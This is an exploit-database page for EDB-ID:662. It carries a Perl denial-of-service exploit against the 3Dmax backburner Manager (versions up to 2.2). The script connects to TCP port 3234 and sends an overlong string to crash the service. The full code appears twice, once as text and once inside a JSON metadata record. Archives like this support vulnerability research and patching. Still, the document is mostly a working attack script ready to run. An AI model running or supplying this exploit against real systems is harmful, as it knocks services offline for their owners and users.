Search...

3Dmax 6.x backburner Manager <= 2.2 - Denial of Service Exploit

2004-11-28T00:00:00

ID EDB-ID:662
Type exploitdb
Reporter Xtiger
Modified 2004-11-28T00:00:00

Description

3Dmax 6.x backburner Manager <= 2.2 Denial of Service Exploit. Dos exploit for windows platform

                                        
                                            #3Dmax backburner Manager Dos Exploit
#There are security hole in 3Dmax backburner Manager Default listen port is 3234.
#It's can be Dos by long string

#Tested on Version
#3dmax 5.0 backburner Manager Version 2.0
#3dmax 6.0 backburner Manager Version 2.2
#3dmax 6.0 SP1 backburner Manager Version 2.2
#All Windows OS

#Found By Xtiger --&gt;www.Xtiger.net&www.ThySea.com
#Code by Xtiger coolsumer@163.com
#Reference:  http://jishu.thysea.com/index.php?modules=show&id=10327
----------------------------------------------------------------
#!C:\perl\bin\perl.exe

use IO::Socket;

my $progname = $0;
$progname =~ s,.'*/,,;
$progname =~ s/\.\w*$//;

$host = shift || 'localhost';
$port = shift || '3234';
$title = " =============================================\n&#8214; 3Dmax backburner Manager Dos Exploit 1.0! &#8214;\n =============================================\n  BY tiger---www.Xtiger.net&www.ThySea.com\n";
$Usage = "  Usage: $progname [Host] [port](default is 3234)\n";

if ($host &gt; 0){
   dos();
}
else  {
   usage();
}

sub dos
{
my $socket = IO::Socket::INET-&gt;new ( Proto =&gt; "tcp",
PeerAddr =&gt; $host,
PeerPort =&gt; $port,
)
or print "$title  [*] ERR--&gt;can't connect to $host:$port! :(\n" and exit;
print ($title, "[*] connected to $host:$port\n");
print "[*] Sending string...\n";

print $socket ("?"x(2364),"\r\n") or die "$title  [*] ERR--&gt;Sending string failed! :(\n";
print "[*] maybe crashed!\n";

$socket-&gt;close;
}

sub usage
{
   die $title,$Usage;
}

# milw0rm.com [2004-11-28]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:662", "hash": "093972d53ae3d0abbb331afd8849fb04", "type": "exploitdb", "bulletinFamily": "exploit", "title": "3Dmax 6.x backburner Manager <= 2.2 - Denial of Service Exploit", "description": "3Dmax 6.x backburner Manager <= 2.2 Denial of Service Exploit. Dos exploit for windows platform", "published": "2004-11-28T00:00:00", "modified": "2004-11-28T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/662/", "reporter": "Xtiger", "references": [], "cvelist": [], "lastseen": "2016-01-31T12:37:56", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "vulnersScore": 5.0}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/662/", "sourceData": "#3Dmax backburner Manager Dos Exploit\r\n#There are security hole in 3Dmax backburner Manager Default listen port is 3234.\r\n#It's can be Dos by long string\r\n\r\n#Tested on Version\r\n#3dmax 5.0 backburner Manager Version 2.0\r\n#3dmax 6.0 backburner Manager Version 2.2\r\n#3dmax 6.0 SP1 backburner Manager Version 2.2\r\n#All Windows OS\r\n\r\n#Found By Xtiger -->www.Xtiger.net&www.ThySea.com\r\n#Code by Xtiger coolsumer@163.com\r\n#Reference: http://jishu.thysea.com/index.php?modules=show&id=10327\r\n----------------------------------------------------------------\r\n#!C:\\perl\\bin\\perl.exe\r\n\r\nuse IO::Socket;\r\n\r\nmy $progname = $0;\r\n$progname =~ s,.'*/,,;\r\n$progname =~ s/\\.\\w*$//;\r\n\r\n$host = shift || 'localhost';\r\n$port = shift || '3234';\r\n$title = \" =============================================\\n‖ 3Dmax backburner Manager Dos Exploit 1.0! ‖\\n =============================================\\n BY tiger---www.Xtiger.net&www.ThySea.com\\n\";\r\n$Usage = \" Usage: $progname [Host] [port](default is 3234)\\n\";\r\n\r\nif ($host > 0){\r\n dos();\r\n}\r\nelse {\r\n usage();\r\n}\r\n\r\nsub dos\r\n{\r\nmy $socket = IO::Socket::INET->new ( Proto => \"tcp\",\r\nPeerAddr => $host,\r\nPeerPort => $port,\r\n)\r\nor print \"$title [*] ERR-->can't connect to $host:$port! :(\\n\" and exit;\r\nprint ($title, \"[*] connected to $host:$port\\n\");\r\nprint \"[*] Sending string...\\n\";\r\n\r\nprint $socket (\"?\"x(2364),\"\\r\\n\") or die \"$title [*] ERR-->Sending string failed! :(\\n\";\r\nprint \"[*] maybe crashed!\\n\";\r\n\r\n$socket->close;\r\n}\r\n\r\nsub usage\r\n{\r\n die $title,$Usage;\r\n}\n\n# milw0rm.com [2004-11-28]\n", "osvdbidlist": ["63258"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

3Dmax 6.x backburner Manager &lt;= 2.2 - Denial of Service Exploit

Description

3Dmax 6.x backburner Manager <= 2.2 Denial of Service Exploit. Dos exploit for windows platform

3Dmax 6.x backburner Manager <= 2.2 - Denial of Service Exploit